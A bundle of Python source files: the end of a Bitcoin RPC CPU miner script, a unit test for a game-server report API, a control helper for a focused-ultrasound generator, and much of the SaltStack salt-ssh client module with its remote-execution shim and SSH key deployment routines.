self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 1337
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
pesapi_test.py
|
import sys
sys.path.append('..')
import unittest
import threading
import socket
import logging
import settings
from pprint import pprint
from interfaces import pesapi
from tornado import ioloop
class APITestCase(unittest.TestCase):
def setUp(self):
self.api = pesapi.PESAPIInterface(settings.pes_api_base_url,
settings.pes_api_userid,
settings.pes_api_privatekey)
def tearDown(self):
pass
class CreateMatchTestCase(APITestCase):
pass
class CreateReportTestCase(APITestCase):
def test_report(self):
offender = 76561197960265728L
victim = 76561197960265728L
reason = "CHEATING"
match_id = 1
self.api.create_report(offender, victim, reason, match_id,
callback = lambda d: pprint(d))
def test_suites():
classes = [ CreateMatchTestCase, CreateReportTestCase ]
return [ unittest.TestLoader().loadTestsFromTestCase(x) for x in classes ]
if __name__ == "__main__":
unittest.TestSuite(test_suites())
# get a tornado ioloop instance running in another thread so we can
# actually test this shiz
t = threading.Thread(target = unittest.main)
t.start()
try:
ioloop.IOLoop.instance().start()
except KeyboardInterrupt:
quit()
|
FUS_Helper.py
|
import threading
import warnings
import util.io as io
import traceback
import sdk.pga as FUS
import multiprocessing
import os
#TODO: Actually record this information somewhere as a log
# class Listener(FUS.FUSListener):
# def onConnect(self):
# print("*** CONNECTED ***")
# def onDisconnect(self, reason):
# print("*** DISCONNECTED *** (reason=%d)" % reason)
# def onExecStart (self, execID, mode):
# print("*** EXEC START *** (id=%d, mode=%d)" % (execID, mode))
# def onShotResult (self, execID, shot_result):
# print("*** SHOT RESULT (id=%d) ***" % execID)
# def onExecResult (self, exec_result):
# print("*** EXEC RESULT ***")
class FUS_GEN():
def __init__(self, all_msgs, motor=None, host=None):
"""Initializes connection the IGT FUS Generator and sets up data structures
for setting up trajectories
Parameters
----------
host : string
Host IP address of the IGT FUS generator
port : int
Port of the IGT FUS Generator
timeout_ms: int
Number of ms to wait before timing out the connection
"""
self.igt_system = FUS.Generator()#loglevel=FUS.LogLevel.ALL
self.igt_system.loadConfig("sdk/generator.json")
self.motor = motor
self.all_msgs = all_msgs
self.run_thread = None
self.num_execs = None
self.host=host
self.running = False
self.connected = False
def connect(self):
try:
if self.igt_system.autoConnect():
self.all_msgs.appendMsg("Connected to IGT System!")
self.igt_system.enableAmplifier(True)
self.igt_system.selectOutput(FUS.Output.EXTERNAL)
self.connected = True
else:
self.all_msgs.appendMsg('Could not connect to IGT System. Check if system is plugged in?')
except Exception as err:
print('ERROR: ' + str(err))
io.line_print(traceback.format_exc())
self.all_msgs.appendMsg('Could not connect to IGT System. Check if system is plugged in?')
def send_traj(self,seq_data):
if self.motor is None or not self.motor.connected:
self.all_msgs.appendMsg('No motor system connected. Movement will be disabled.')
else:
self.use_motor = True
self.trajectory = []
self.motor_traj = []
for pulse in seq_data["Sequence"]:
self.trajectory.append(FUS.Pulse(
dura = int(pulse["Duration"]*1000.0), #Duration in microseconds
dela = int(pulse["Delay"]*1000.0), #Delay in microseconds
ampl = int(pulse["Amplitude"]/100.0 * 1023), #Amplitude in [0,1023]
freq = int(pulse["Freq"]*1.0e6) #US Frequency in Hz
))
self.motor_traj.append((pulse["MoveX"], pulse["MoveY"], pulse["MoveZ"]))
self.num_execs = seq_data["ExecutionCount"]
self.seq_delay = int(seq_data["SequenceDelay"]*1000.0)
self.num_pulses = self.num_execs * len(self.trajectory)
#Schedule the FUS Firing
self.run_thread = multiprocessing.Process(target = self.execute_traj)
self.all_msgs.appendMsg("Sequence successfully sent.")
def run(self):
"""Starts the FUS execution queue
"""
if self.running:
self.all_msgs.appendMsg("ERROR: Experiment is already running!")
return
if not self.connected:
self.all_msgs.appendMsg("ERROR: Generator is not connected!")
return
# Start the execution
self.run_thread.start()
self.running = True
def close(self):
"""Disconnects the IGT System
"""
if self.connected:
self.igt_system.enableAmplifier(False)
self.igt_system.disconnect()
self.connected = False
self.all_msgs.appendMsg("Generator shutdown successfully.")
else:
self.all_msgs.appendMsg("Generator is already shutdown!")
def stop(self):
"""Stops the experiment
"""
if not self.running:
warnings.warn('<FUS_GEN> Experiment is already stopped')
return
self.running = False
self.igt_system.stopSequence()
self.run_thread.terminate()
self.run_thread.join()
self.run_thread = None
all_msgs.appendMsg('Sequence aborted at ' + io.get_time_string())
def add_finish(self,start_time):
"""Schedules when to stop the experiment (at the same time as the RPi)
Parameters
----------
start_time : float
Number of seconds when to stop the experiment
"""
self.events.append(threading.Timer(start_time,self.stop))
def reconnect(self):
"""Reconnects the IGT System
"""
if self.connected:
warnings.warn('<FUS_GEN> System is already connected',RuntimeWarning)
return
else:
if self.igt_system.autoConnect():
print("Connected to IGT System ", self.host)
else:
raise EnvironmentError('<FUS_GEN> Could not connect to IGT System')
def execute_traj(self):
"""Tells the IGT system to execute the current trajectory and then loads the next trajectory if necessary
into the Generator's buffers
Parameters
----------
traj_id : int
Index of the trajectory to be executed
"""
exec_flags = FUS.ExecFlag.ASYNC_PULSE_RESULT
self.igt_system.executeSequence(self.num_execs,self.seq_delay,exec_flags)
for i in range(self.num_pulses):
if not self.running:
break
measure = self.igt_system.readAsyncPulse()
#Issue Move command if motor is connected
if self.motor and self.motor.connected:
self.motor.moveRel(self.motor_traj[i % len(self.motor_traj)])
#Print Result of the FUS Shot
self.all_msgs.appendMsg('FUS RESULT: ' + str(measure))
self.running = False
all_msgs.appendMsg('Sequence finished at ' + io.get_time_string())
|
__init__.py
|
"""
Create ssh executor system
"""
import base64
import binascii
import copy
import datetime
import getpass
import hashlib
import logging
import multiprocessing
import os
import re
import subprocess
import sys
import tarfile
import tempfile
import time
import uuid
import salt.client.ssh.shell
import salt.client.ssh.wrapper
import salt.config
import salt.defaults.exitcodes
import salt.exceptions
import salt.loader
import salt.log
import salt.minion
import salt.output
import salt.roster
import salt.serializers.yaml
import salt.state
import salt.utils.args
import salt.utils.atomicfile
import salt.utils.event
import salt.utils.files
import salt.utils.hashutils
import salt.utils.json
import salt.utils.network
import salt.utils.path
import salt.utils.stringutils
import salt.utils.thin
import salt.utils.url
import salt.utils.verify
from salt.ext import six
from salt.ext.six.moves import input # pylint: disable=import-error,redefined-builtin
from salt.template import compile_template
from salt.utils.platform import is_windows
from salt.utils.process import Process
from salt.utils.zeromq import zmq
try:
import saltwinshell
HAS_WINSHELL = True
except ImportError:
HAS_WINSHELL = False
# The directory where salt thin is deployed
DEFAULT_THIN_DIR = "/var/tmp/.%%USER%%_%%FQDNUUID%%_salt"
# RSTR is just a delimiter to distinguish the beginning of salt STDOUT
# and STDERR. There is no special meaning. Messages prior to RSTR in
# stderr and stdout are either from SSH or from the shim.
#
# RSTR on both stdout and stderr:
# no errors in SHIM - output after RSTR is from salt
# No RSTR in stderr, RSTR in stdout:
# no errors in SSH_SH_SHIM, but SHIM commands for salt master are after
# RSTR in stdout
# No RSTR in stderr, no RSTR in stdout:
# Failure in SHIM
# RSTR in stderr, No RSTR in stdout:
# Undefined behavior
RSTR = "_edbc7885e4f9aac9b83b35999b68d015148caf467b78fa39c05f669c0ff89878"
# The regex to find RSTR in output - Must be on an output line by itself
# NOTE - must use non-grouping match groups or output splitting will fail.
RSTR_RE = r"(?:^|\r?\n)" + RSTR + r"(?:\r?\n|$)"
# METHODOLOGY:
#
# 1) Make the _thinnest_ /bin/sh shim (SSH_SH_SHIM) to find the python
# interpreter and get it invoked
# 2) Once a qualified python is found start it with the SSH_PY_SHIM
# 3) The shim is converted to a single semicolon separated line, so
# some constructs are needed to keep it clean.
# NOTE:
# * SSH_SH_SHIM is generic and can be used to load+exec *any* python
# script on the target.
# * SSH_PY_SHIM is in a separate file rather than stuffed in a string
# in salt/client/ssh/__init__.py - this makes testing *easy* because
# it can be invoked directly.
# * SSH_PY_SHIM is base64 encoded and formatted into the SSH_SH_SHIM
# string. This makes the python script "armored" so that it can
# all be passed in the SSH command and will not need special quoting
# (which likely would be impossibe to do anyway)
# * The formatted SSH_SH_SHIM with the SSH_PY_SHIM payload is a bit
# big (~7.5k). If this proves problematic for an SSH command we
# might try simply invoking "/bin/sh -s" and passing the formatted
# SSH_SH_SHIM on SSH stdin.
# NOTE: there are two passes of formatting:
# 1) Substitute in static values
# - EX_THIN_PYTHON_INVALID - exit code if a suitable python is not found
# 2) Substitute in instance-specific commands
# - DEBUG - enable shim debugging (any non-zero string enables)
# - SUDO - load python and execute as root (any non-zero string enables)
# - SSH_PY_CODE - base64-encoded python code to execute
# - SSH_PY_ARGS - arguments to pass to python code
# This shim generically loads python code . . . and *no* more.
# - Uses /bin/sh for maximum compatibility - then jumps to
# python for ultra-maximum compatibility.
#
# 1. Identify a suitable python
# 2. Jump to python
# Note the list-comprehension syntax to define SSH_SH_SHIM is needed
# to be able to define the string with indentation for readability but
# still strip the white space for compactness and to avoid issues with
# some multi-line embedded python code having indentation errors
SSH_SH_SHIM = "\n".join(
[
s.strip()
for s in r'''/bin/sh << 'EOF'
set -e
set -u
DEBUG="{{DEBUG}}"
if [ -n "$DEBUG" ]
then set -x
fi
SET_PATH="{{SET_PATH}}"
if [ -n "$SET_PATH" ]
then export PATH={{SET_PATH}}
fi
SUDO=""
if [ -n "{{SUDO}}" ]
then SUDO="sudo "
fi
SUDO_USER="{{SUDO_USER}}"
if [ "$SUDO" ] && [ "$SUDO_USER" ]
then SUDO="sudo -u {{SUDO_USER}}"
elif [ "$SUDO" ] && [ -n "$SUDO_USER" ]
then SUDO="sudo "
fi
EX_PYTHON_INVALID={EX_THIN_PYTHON_INVALID}
PYTHON_CMDS="python3 /usr/libexec/platform-python python27 python2.7 python26 python2.6 python2 python"
for py_cmd in $PYTHON_CMDS
do
if command -v "$py_cmd" >/dev/null 2>&1 && "$py_cmd" -c "import sys; sys.exit(not (sys.version_info >= (2, 6)));"
then
py_cmd_path=`"$py_cmd" -c 'from __future__ import print_function;import sys; print(sys.executable);'`
cmdpath=`command -v $py_cmd 2>/dev/null || which $py_cmd 2>/dev/null`
if file $cmdpath | grep "shell script" > /dev/null
then
ex_vars="'PATH', 'LD_LIBRARY_PATH', 'MANPATH', \
'XDG_DATA_DIRS', 'PKG_CONFIG_PATH'"
export `$py_cmd -c \
"from __future__ import print_function;
import sys;
import os;
map(sys.stdout.write, ['{{{{0}}}}={{{{1}}}} ' \
.format(x, os.environ[x]) for x in [$ex_vars]])"`
exec $SUDO PATH=$PATH LD_LIBRARY_PATH=$LD_LIBRARY_PATH \
MANPATH=$MANPATH XDG_DATA_DIRS=$XDG_DATA_DIRS \
PKG_CONFIG_PATH=$PKG_CONFIG_PATH \
"$py_cmd_path" -c \
'import base64;
exec(base64.b64decode("""{{SSH_PY_CODE}}""").decode("utf-8"))'
else
exec $SUDO "$py_cmd_path" -c \
'import base64;
exec(base64.b64decode("""{{SSH_PY_CODE}}""").decode("utf-8"))'
fi
exit 0
else
continue
fi
done
echo "ERROR: Unable to locate appropriate python command" >&2
exit $EX_PYTHON_INVALID
EOF'''.format(
EX_THIN_PYTHON_INVALID=salt.defaults.exitcodes.EX_THIN_PYTHON_INVALID,
).split(
"\n"
)
]
)
if not is_windows():
shim_file = os.path.join(os.path.dirname(__file__), "ssh_py_shim.py")
if not os.path.exists(shim_file):
# On esky builds we only have the .pyc file
shim_file += "c"
with salt.utils.files.fopen(shim_file) as ssh_py_shim:
SSH_PY_SHIM = ssh_py_shim.read()
log = logging.getLogger(__name__)
class SSH:
"""
Create an SSH execution system
"""
ROSTER_UPDATE_FLAG = "#__needs_update"
def __init__(self, opts):
self.__parsed_rosters = {SSH.ROSTER_UPDATE_FLAG: True}
pull_sock = os.path.join(opts["sock_dir"], "master_event_pull.ipc")
if os.path.exists(pull_sock) and zmq:
self.event = salt.utils.event.get_event(
"master", opts["sock_dir"], opts["transport"], opts=opts, listen=False
)
else:
self.event = None
self.opts = opts
if self.opts["regen_thin"]:
self.opts["ssh_wipe"] = True
if not salt.utils.path.which("ssh"):
raise salt.exceptions.SaltSystemExit(
code=-1,
msg="No ssh binary found in path -- ssh must be installed for salt-ssh to run. Exiting.",
)
self.opts["_ssh_version"] = ssh_version()
self.tgt_type = (
self.opts["selected_target_option"]
if self.opts["selected_target_option"]
else "glob"
)
self._expand_target()
self.roster = salt.roster.Roster(self.opts, self.opts.get("roster", "flat"))
self.targets = self.roster.targets(self.opts["tgt"], self.tgt_type)
if not self.targets:
self._update_targets()
# If we're in a wfunc, we need to get the ssh key location from the
# top level opts, stored in __master_opts__
if "__master_opts__" in self.opts:
if self.opts["__master_opts__"].get("ssh_use_home_key") and os.path.isfile(
os.path.expanduser("~/.ssh/id_rsa")
):
priv = os.path.expanduser("~/.ssh/id_rsa")
else:
priv = self.opts["__master_opts__"].get(
"ssh_priv",
os.path.join(
self.opts["__master_opts__"]["pki_dir"], "ssh", "salt-ssh.rsa"
),
)
else:
priv = self.opts.get(
"ssh_priv", os.path.join(self.opts["pki_dir"], "ssh", "salt-ssh.rsa")
)
if priv != "agent-forwarding":
if not os.path.isfile(priv):
try:
salt.client.ssh.shell.gen_key(priv)
except OSError:
raise salt.exceptions.SaltClientError(
"salt-ssh could not be run because it could not generate keys.\n\n"
"You can probably resolve this by executing this script with "
"increased permissions via sudo or by running as root.\n"
"You could also use the '-c' option to supply a configuration "
"directory that you have permissions to read and write to."
)
self.defaults = {
"user": self.opts.get(
"ssh_user", salt.config.DEFAULT_MASTER_OPTS["ssh_user"]
),
"port": self.opts.get(
"ssh_port", salt.config.DEFAULT_MASTER_OPTS["ssh_port"]
),
"passwd": self.opts.get(
"ssh_passwd", salt.config.DEFAULT_MASTER_OPTS["ssh_passwd"]
),
"priv": priv,
"priv_passwd": self.opts.get(
"ssh_priv_passwd", salt.config.DEFAULT_MASTER_OPTS["ssh_priv_passwd"]
),
"timeout": self.opts.get(
"ssh_timeout", salt.config.DEFAULT_MASTER_OPTS["ssh_timeout"]
)
+ self.opts.get("timeout", salt.config.DEFAULT_MASTER_OPTS["timeout"]),
"sudo": self.opts.get(
"ssh_sudo", salt.config.DEFAULT_MASTER_OPTS["ssh_sudo"]
),
"sudo_user": self.opts.get(
"ssh_sudo_user", salt.config.DEFAULT_MASTER_OPTS["ssh_sudo_user"]
),
"identities_only": self.opts.get(
"ssh_identities_only",
salt.config.DEFAULT_MASTER_OPTS["ssh_identities_only"],
),
"remote_port_forwards": self.opts.get("ssh_remote_port_forwards"),
"ssh_options": self.opts.get("ssh_options"),
}
if self.opts.get("rand_thin_dir"):
self.defaults["thin_dir"] = os.path.join(
"/var/tmp", ".{}".format(uuid.uuid4().hex[:6])
)
self.opts["ssh_wipe"] = "True"
self.serial = salt.payload.Serial(opts)
self.returners = salt.loader.returners(self.opts, {})
self.fsclient = salt.fileclient.FSClient(self.opts)
self.thin = salt.utils.thin.gen_thin(
self.opts["cachedir"],
extra_mods=self.opts.get("thin_extra_mods"),
overwrite=self.opts["regen_thin"],
python2_bin=self.opts["python2_bin"],
python3_bin=self.opts["python3_bin"],
extended_cfg=self.opts.get("ssh_ext_alternatives"),
)
self.mods = mod_data(self.fsclient)
@property
def parse_tgt(self):
"""
Method to determine the hostname and user
when bypassing the roster and using
ssh syntax (ex. root@localhost)
"""
if not self.opts.get("ssh_cli_tgt"):
self.opts["ssh_cli_tgt"] = self.opts.get("tgt", "")
hostname = self.opts.get("ssh_cli_tgt", "")
if isinstance(hostname, str) and "@" in hostname:
user, hostname = hostname.split("@", 1)
else:
user = self.opts.get("ssh_user")
return {"hostname": hostname, "user": user}
def _get_roster(self):
"""
Read roster filename as a key to the data.
:return:
"""
roster_file = salt.roster.get_roster_file(self.opts)
if roster_file not in self.__parsed_rosters:
roster_data = compile_template(
roster_file,
salt.loader.render(self.opts, {}),
self.opts["renderer"],
self.opts["renderer_blacklist"],
self.opts["renderer_whitelist"],
)
self.__parsed_rosters[roster_file] = roster_data
return roster_file
def _expand_target(self):
"""
Figures out if the target is a reachable host without wildcards, expands if any.
:return:
"""
# TODO: Support -L
hostname = self.parse_tgt["hostname"]
if isinstance(hostname, list):
return
needs_expansion = "*" not in hostname and salt.utils.network.is_reachable_host(
hostname
)
if needs_expansion:
if hostname is None:
# Reverse lookup failed
return
self._get_roster()
for roster_filename in self.__parsed_rosters:
roster_data = self.__parsed_rosters[roster_filename]
if not isinstance(roster_data, bool):
for host_id in roster_data:
if hostname in [host_id, roster_data[host_id].get("host")]:
if hostname != self.opts["tgt"]:
self.opts["tgt"] = hostname
self.__parsed_rosters[self.ROSTER_UPDATE_FLAG] = False
return
def _update_roster(self, hostname=None, user=None):
"""
Update default flat roster with the passed in information.
:return:
"""
roster_file = self._get_roster()
if os.access(roster_file, os.W_OK):
if self.__parsed_rosters[self.ROSTER_UPDATE_FLAG]:
with salt.utils.files.fopen(roster_file, "a") as roster_fp:
roster_fp.write(
'# Automatically added by "{s_user}" at {s_time}\n{hostname}:\n host: '
"{hostname}\n user: {user}"
"\n passwd: {passwd}\n".format(
s_user=getpass.getuser(),
s_time=datetime.datetime.utcnow().isoformat(),
hostname=hostname if hostname else self.opts.get("tgt", ""),
user=user if user else self.opts.get("ssh_user", ""),
passwd=self.opts.get("ssh_passwd", ""),
)
)
log.info(
"The host {} has been added to the roster {}".format(
self.opts.get("tgt", ""), roster_file
)
)
else:
log.error("Unable to update roster {}: access denied".format(roster_file))
def _update_targets(self):
"""
Uptade targets in case hostname was directly passed without the roster.
:return:
"""
hosts = self.parse_tgt["hostname"]
user = self.parse_tgt["user"]
if not isinstance(hosts, (list, tuple)):
hosts = list([hosts])
_hosts = list()
for hostname in hosts:
_user = user
if "@" in hostname:
_user, hostname = hostname.split("@", 1)
if hostname == "*":
continue
if salt.utils.network.is_reachable_host(hostname):
_hosts.append(hostname)
self.targets[hostname] = {
"passwd": self.opts.get("ssh_passwd", ""),
"host": hostname,
"user": _user,
}
if self.opts.get("ssh_update_roster"):
self._update_roster(hostname=hostname, user=_user)
if self.tgt_type == "list":
self.opts["tgt"] = _hosts
elif _hosts:
self.opts["tgt"] = _hosts[0]
def get_pubkey(self):
"""
Return the key string for the SSH public key
"""
if (
"__master_opts__" in self.opts
and self.opts["__master_opts__"].get("ssh_use_home_key")
and os.path.isfile(os.path.expanduser("~/.ssh/id_rsa"))
):
priv = os.path.expanduser("~/.ssh/id_rsa")
else:
priv = self.opts.get(
"ssh_priv", os.path.join(self.opts["pki_dir"], "ssh", "salt-ssh.rsa")
)
pub = "{}.pub".format(priv)
with salt.utils.files.fopen(pub, "r") as fp_:
return "{} rsa root@master".format(fp_.read().split()[1])
def key_deploy(self, host, ret):
"""
Deploy the SSH key if the minions don't auth
"""
if not isinstance(ret[host], dict) or self.opts.get("ssh_key_deploy"):
target = self.targets[host]
if target.get("passwd", False) or self.opts["ssh_passwd"]:
self._key_deploy_run(host, target, False)
return ret
if ret[host].get("stderr", "").count("Permission denied"):
target = self.targets[host]
# permission denied, attempt to auto deploy ssh key
print(
(
"Permission denied for host {}, do you want to deploy "
"the salt-ssh key? (password required):"
).format(host)
)
deploy = input("[Y/n] ")
if deploy.startswith(("n", "N")):
return ret
target["passwd"] = getpass.getpass(
"Password for {}@{}: ".format(target["user"], host)
)
return self._key_deploy_run(host, target, True)
return ret
def _key_deploy_run(self, host, target, re_run=True):
"""
The ssh-copy-id routine
"""
argv = [
"ssh.set_auth_key",
target.get("user", "root"),
self.get_pubkey(),
]
single = Single(
self.opts,
argv,
host,
mods=self.mods,
fsclient=self.fsclient,
thin=self.thin,
**target
)
if salt.utils.path.which("ssh-copy-id"):
# we have ssh-copy-id, use it!
stdout, stderr, retcode = single.shell.copy_id()
else:
stdout, stderr, retcode = single.run()
if re_run:
target.pop("passwd")
single = Single(
self.opts,
self.opts["argv"],
host,
mods=self.mods,
fsclient=self.fsclient,
thin=self.thin,
**target
)
stdout, stderr, retcode = single.cmd_block()
try:
data = salt.utils.json.find_json(stdout)
return {host: data.get("local", data)}
except Exception: # pylint: disable=broad-except
if stderr:
return {host: stderr}
return {host: "Bad Return"}
if salt.defaults.exitcodes.EX_OK != retcode:
return {host: stderr}
return {host: stdout}
def handle_routine(self, que, opts, host, target, mine=False):
"""
Run the routine in a "Thread", put a dict on the queue
"""
opts = copy.deepcopy(opts)
single = Single(
opts,
opts["argv"],
host,
mods=self.mods,
fsclient=self.fsclient,
thin=self.thin,
mine=mine,
**target
)
ret = {"id": single.id}
logging._acquireLock()
stdout, stderr, retcode = single.run()
logging._releaseLock()
# This job is done, yield
try:
data = salt.utils.json.find_json(stdout)
if len(data) < 2 and "local" in data:
ret["ret"] = data["local"]
else:
ret["ret"] = {
"stdout": stdout,
"stderr": stderr,
"retcode": retcode,
}
except Exception: # pylint: disable=broad-except
ret["ret"] = {
"stdout": stdout,
"stderr": stderr,
"retcode": retcode,
}
que.put(ret)
def handle_ssh(self, mine=False):
"""
Spin up the needed threads or processes and execute the subsequent
routines
"""
que = multiprocessing.Queue()
running = {}
target_iter = self.targets.__iter__()
returned = set()
rets = set()
init = False
while True:
if not self.targets:
log.error("No matching targets found in roster.")
break
if len(running) < self.opts.get("ssh_max_procs", 25) and not init:
try:
host = next(target_iter)
except StopIteration:
init = True
continue
for default in self.defaults:
if default not in self.targets[host]:
self.targets[host][default] = self.defaults[default]
if "host" not in self.targets[host]:
self.targets[host]["host"] = host
if self.targets[host].get("winrm") and not HAS_WINSHELL:
returned.add(host)
rets.add(host)
log_msg = "Please contact sales@saltstack.com for access to the enterprise saltwinshell module."
log.debug(log_msg)
no_ret = {
"fun_args": [],
"jid": None,
"return": log_msg,
"retcode": 1,
"fun": "",
"id": host,
}
yield {host: no_ret}
continue
args = (
que,
self.opts,
host,
self.targets[host],
mine,
)
try:
logging._acquireLock()
routine = Process(target=self.handle_routine, args=args)
routine.start()
except:
pass
finally:
logging._releaseLock()
running[host] = {"thread": routine}
continue
ret = {}
try:
ret = que.get(False)
if "id" in ret:
returned.add(ret["id"])
yield {ret["id"]: ret["ret"]}
except Exception: # pylint: disable=broad-except
# This bare exception is here to catch spurious exceptions
# thrown by que.get during healthy operation. Please do not
# worry about this bare exception, it is entirely here to
# control program flow.
pass
for host in running:
if not running[host]["thread"].is_alive():
if host not in returned:
# Try to get any returns that came through since we
# last checked
try:
while True:
ret = que.get(False)
if "id" in ret:
returned.add(ret["id"])
yield {ret["id"]: ret["ret"]}
except Exception: # pylint: disable=broad-except
pass
if host not in returned:
error = (
"Target '{}' did not return any data, "
"probably due to an error."
).format(host)
ret = {"id": host, "ret": error}
log.error(error)
yield {ret["id"]: ret["ret"]}
running[host]["thread"].join()
rets.add(host)
for host in rets:
if host in running:
running.pop(host)
if len(rets) >= len(self.targets):
break
# Sleep when limit or all threads started
if len(running) >= self.opts.get("ssh_max_procs", 25) or len(
self.targets
) >= len(running):
time.sleep(0.1)
def run_iter(self, mine=False, jid=None):
"""
Execute and yield returns as they come in, do not print to the display
mine
The Single objects will use mine_functions defined in the roster,
pillar, or master config (they will be checked in that order) and
will modify the argv with the arguments from mine_functions
"""
fstr = "{}.prep_jid".format(self.opts["master_job_cache"])
jid = self.returners[fstr](passed_jid=jid or self.opts.get("jid", None))
# Save the invocation information
argv = self.opts["argv"]
if self.opts.get("raw_shell", False):
fun = "ssh._raw"
args = argv
else:
fun = argv[0] if argv else ""
args = argv[1:]
job_load = {
"jid": jid,
"tgt_type": self.tgt_type,
"tgt": self.opts["tgt"],
"user": self.opts["user"],
"fun": fun,
"arg": args,
}
# save load to the master job cache
if self.opts["master_job_cache"] == "local_cache":
self.returners["{}.save_load".format(self.opts["master_job_cache"])](
jid, job_load, minions=self.targets.keys()
)
else:
self.returners["{}.save_load".format(self.opts["master_job_cache"])](
jid, job_load
)
for ret in self.handle_ssh(mine=mine):
host = next(iter(ret.keys()))
self.cache_job(jid, host, ret[host], fun)
if self.event:
id_, data = next(iter(ret.items()))
if isinstance(data, str):
data = {"return": data}
if "id" not in data:
data["id"] = id_
if "fun" not in data:
data["fun"] = fun
data[
"jid"
] = jid # make the jid in the payload the same as the jid in the tag
self.event.fire_event(
data, salt.utils.event.tagify([jid, "ret", host], "job")
)
yield ret
def cache_job(self, jid, id_, ret, fun):
"""
Cache the job information
"""
self.returners["{}.returner".format(self.opts["master_job_cache"])](
{"jid": jid, "id": id_, "return": ret, "fun": fun}
)
def run(self, jid=None):
"""
Execute the overall routine, print results via outputters
"""
if self.opts.get("list_hosts"):
self._get_roster()
ret = {}
for roster_file in self.__parsed_rosters:
if roster_file.startswith("#"):
continue
ret[roster_file] = {}
for host_id in self.__parsed_rosters[roster_file]:
hostname = self.__parsed_rosters[roster_file][host_id]["host"]
ret[roster_file][host_id] = hostname
salt.output.display_output(ret, "nested", self.opts)
sys.exit()
fstr = "{}.prep_jid".format(self.opts["master_job_cache"])
jid = self.returners[fstr](passed_jid=jid or self.opts.get("jid", None))
# Save the invocation information
argv = self.opts["argv"]
if self.opts.get("raw_shell", False):
fun = "ssh._raw"
args = argv
else:
fun = argv[0] if argv else ""
args = argv[1:]
job_load = {
"jid": jid,
"tgt_type": self.tgt_type,
"tgt": self.opts["tgt"],
"user": self.opts["user"],
"fun": fun,
"arg": args,
}
# save load to the master job cache
try:
if isinstance(jid, bytes):
jid = jid.decode("utf-8")
if self.opts["master_job_cache"] == "local_cache":
self.returners["{}.save_load".format(self.opts["master_job_cache"])](
jid, job_load, minions=self.targets.keys()
)
else:
self.returners["{}.save_load".format(self.opts["master_job_cache"])](
jid, job_load
)
except Exception as exc: # pylint: disable=broad-except
log.exception(exc)
log.error(
"Could not save load with returner %s: %s",
self.opts["master_job_cache"],
exc,
)
if self.opts.get("verbose"):
msg = "Executing job with jid {}".format(jid)
print(msg)
print("-" * len(msg) + "\n")
print("")
sret = {}
outputter = self.opts.get("output", "nested")
final_exit = 0
for ret in self.handle_ssh():
host = next(iter(ret.keys()))
if isinstance(ret[host], dict):
host_ret = ret[host].get("retcode", 0)
if host_ret != 0:
final_exit = 1
else:
# Error on host
final_exit = 1
self.cache_job(jid, host, ret[host], fun)
ret = self.key_deploy(host, ret)
if isinstance(ret[host], dict) and (
ret[host].get("stderr") or ""
).startswith("ssh:"):
ret[host] = ret[host]["stderr"]
if not isinstance(ret[host], dict):
p_data = {host: ret[host]}
elif "return" not in ret[host]:
p_data = ret
else:
outputter = ret[host].get("out", self.opts.get("output", "nested"))
p_data = {host: ret[host].get("return", {})}
if self.opts.get("static"):
sret.update(p_data)
else:
salt.output.display_output(p_data, outputter, self.opts)
if self.event:
id_, data = next(iter(ret.items()))
if isinstance(data, str):
data = {"return": data}
if "id" not in data:
data["id"] = id_
if "fun" not in data:
data["fun"] = fun
data[
"jid"
] = jid # make the jid in the payload the same as the jid in the tag
self.event.fire_event(
data, salt.utils.event.tagify([jid, "ret", host], "job")
)
if self.opts.get("static"):
salt.output.display_output(sret, outputter, self.opts)
if final_exit:
sys.exit(salt.defaults.exitcodes.EX_AGGREGATE)
class Single:
"""
Hold onto a single ssh execution
"""
# 1. Get command ready
# 2. Check if target has salt
# 3. deploy salt-thin
# 4. execute requested command via salt-thin
def __init__(
self,
opts,
argv,
id_,
host,
user=None,
port=None,
passwd=None,
priv=None,
priv_passwd=None,
timeout=30,
sudo=False,
tty=False,
mods=None,
fsclient=None,
thin=None,
mine=False,
minion_opts=None,
identities_only=False,
sudo_user=None,
remote_port_forwards=None,
winrm=False,
ssh_options=None,
**kwargs
):
# Get mine setting and mine_functions if defined in kwargs (from roster)
self.mine = mine
self.mine_functions = kwargs.get("mine_functions")
self.cmd_umask = kwargs.get("cmd_umask", None)
self.winrm = winrm
self.opts = opts
self.tty = tty
if kwargs.get("disable_wipe"):
self.wipe = False
else:
self.wipe = bool(self.opts.get("ssh_wipe"))
if kwargs.get("thin_dir"):
self.thin_dir = kwargs["thin_dir"]
elif self.winrm:
saltwinshell.set_winvars(self)
self.python_env = kwargs.get("ssh_python_env")
else:
if user:
thin_dir = DEFAULT_THIN_DIR.replace("%%USER%%", user)
else:
thin_dir = DEFAULT_THIN_DIR.replace("%%USER%%", "root")
self.thin_dir = thin_dir.replace(
"%%FQDNUUID%%",
uuid.uuid3(uuid.NAMESPACE_DNS, salt.utils.network.get_fqhostname()).hex[
:6
],
)
self.opts["thin_dir"] = self.thin_dir
self.fsclient = fsclient
self.context = {"master_opts": self.opts, "fileclient": self.fsclient}
self.ssh_pre_flight = kwargs.get("ssh_pre_flight", None)
